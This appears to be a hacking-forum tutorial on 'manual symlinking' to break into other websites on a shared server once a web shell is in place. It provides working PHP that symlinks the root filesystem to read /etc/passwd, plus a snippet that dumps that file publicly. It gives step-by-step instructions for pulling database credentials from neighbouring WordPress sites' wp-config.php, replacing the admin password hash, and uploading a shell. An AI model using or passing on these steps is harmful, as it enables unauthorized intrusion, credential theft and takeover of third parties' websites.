Advanced Symlinking - Doing it the manual way

**Not 100% finished but almost! Enjoy whats here so far**
Also, I mention files that i'm including in with this tutorial, they are not available yet! be patient :)

Ok, So today I will be showing you how do to some manual symlinking. The traditional method people use is a symlink shell which normally tries to symlink via the named.conf file.

The problem with this, is that more often than not, servers will not let you read this file. So what to do when in this position? Thats where this tutorial comes in.

So, I will start this assuming that you uploaded your shell, upload the symlink shell, and find the named.conf error as seen in the following image.



What do you do from here? Well, thats where the fun part begins! To accomplish our symlinking, we will need access to the etc/passwd file. If you do not have shell access, You will need to google methods of obtaining this file's contents as I will not show you that part. Instead, I will focus on symlinking the root folder from shell access.

So, To start the process, create a new php file on the server (name it whatever you want) and insert the following code. The code is commented so you understand whats going on here.
THIS CODE IS MADE INTO s.php IN MY FILES LIST I AM INCLUDING IN THIS TUTORIAL

PHP Code:

<?php
// This is making our initial "sym" folder, where the symlinked root folder should end up
@mkdir("sym",0777); 
// This is a variable holding the contents of what will be the .htaccess file in the "sym" directory
$htinfo  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
// this is basically telling it to open (or create) the .htaccess file and write the above text into it. Note: The "w" means to OVERWRITE whatever is in the file already
$doopen =@fopen ("sym/.htaccess","w");
// This is telling it to write the contents of $htinfo to the file
fwrite($doopen ,$htinfo);
// This is the doing the symlink of the root folder putting it into the "sym" directory
@symlink("/","sym/root");
// this variable is just to state directory location of root folder for the following checking function
$symroot = "sym/root/";
// this is to determine whether or not symlinking the root folder worked by checking if it exists.
if (!file_exists($symroot)) {
    // Throw error messege if its not found (FAILED!) game over.
    echo "root directory not symlinked";
    exit;
}
// this means root folder was found (symlinked correctly)
else {
    // letting u know it was found!
    echo "root symlink success! Go get 'em tiger";
    // link to the etc/passwd file
    echo "etc/passwd file: <a href='sym/root/etc/passwd'>View It</a>";
}

?>

Now that you have your new file created, it's time to run it and see if you can symlink it or not. Go to the url in your browser and look at what message you get!

If it was successful, open the etc/passwd file by clicking the link. If it was not successful, find another site because your not going to be using this method!

Once you have the etc/passwd file open, duplicate the tab (if in chrome) or just open a new page to the same file so that you have 2 of them open. you will see why soon.



So, once you got the file open, you want to look at where the sites are located for the symlinking. Usually they are in "/home/USERNAME/public_html" but not always. Look at the following picture, it indicates where you find the path to the websites.


Now, the usual way of doing usernames, is taking the first 8 characters of the domain name. BUT! This doesn't always work either. Some servers every one is 8 characters, some are 6, some are mixed (like in this example), some are full domains etc.. Basically, it varies on the server.

the following image will show you what i mean and i will run through some examples.



So, yes sometimes, you can guess the username, but not always ( this ties into something else i will cover in just a bit toward the end of the tutorial)

Look at the etc/passwd file and pick a username. for this tutorial, im using this line. contento:x:516:517::/home/contento:/bin/bash

So, on the duplicate etc/passwd page, in the URL, remove "etc/passwd" and replace with "home/username/public_html/" like in the example below.



Now, when you hit enter, you will more than likely see 1 of 2 things, either a list of files/directories of the website your trying to symlink (success) or a FORBIDDEN message which means you can't symlink that site. 



You have now successfully symlinked the website, so lets get us a shell. *NOTE* You need a good idea of what your after, I mainly go for wordpress/joomla/forums as they have shell upload abilities. Cart software and such I skip over as its too much trouble to try to shell.

Lets assume its a wordpress site like this example. On the page that lists the folders/files, click on the wp-config.php. You will see the contents of the file containing database connection information.

Should look like this:


Now, go back to your shell, upload a database connector script (database.php) In the included files.

Use the connection information from the wp-config.php and connect to the database. find the wp_users table and enter it, you will see the list of usernames and passwords etc, click edit beside the admin user.

Here, you will need to note the "user_login" name, and replace the password. To create a WordPress hash, visit http://www.insidepro.com/hashes.php?lang=eng put in your password where it says "Password:" and hit generate.

Scroll down to where you see "MD5(Wordpress)" and copy the hash it generated beside it. Go back to the db connection script and replace admin password with yours. Now press "Edit Data" and go back to the tables list. You need to find out what the URL is for the website so go into the "WP_options" table and you will see the URL.

Now, go to the URL and enter in the login details, You will be in the admin panel where you upload your shell. There are plenty of tutorials on this so I wont add this bit in this tut.

CONGRATS! you now have successfully symlinked a server manually!

Now, I will go over some other little things that deal with this method, as the above is as simple as it gets and on a good working server.

I will provide what the issue is and possible methods of getting around it.

Issue #1
Sometimes, you can symlink the root folder and not able to acces etc/passwd file but can still symlink it. If this is the case, add the following code to the s.php under the @symlink line.

PHP Code:

<?php
$efile = file_get_contents("sym/root/etc/passwd");
$pfile = fopen('passwd.txt', 'w');
fwrite($pfile, $efile);
echo "<p><a href='passwd.txt'>Passwd.txt</a></p>";
?>

This will create passwd.txt file with the etc/passwd contents in it 

From here, u continue symlinking.

Issue #2
Sometimes, you simply can't get the etc passwd file no matter what, but you can go to home/username/public_html with a correct username. So, I have a work around for this. What you need first is the IP of the server. Take it off your shell or use this method.
Copy the domain name, and go to http://www.centralops.net and click dossier. Uncheck the 3 checked boxes, paste the url and hit go, it will give you the ip. Next, go to Bing.com and in the search bar, type "ip:xxx.xxx.xx.xx" and hit enter. Change the xx's to the ip of course.

After that, bing will list all the domains on that server, take the first 6, 8, etc.. characters of the domain and try to symlink them. Sometimes you will get lucky, sometimes you wont.

I will update this more when I get a chance, works gettin busy but I wanted to go ahead and share this main part <3

Categories: Hacking tutorials, SQL Injection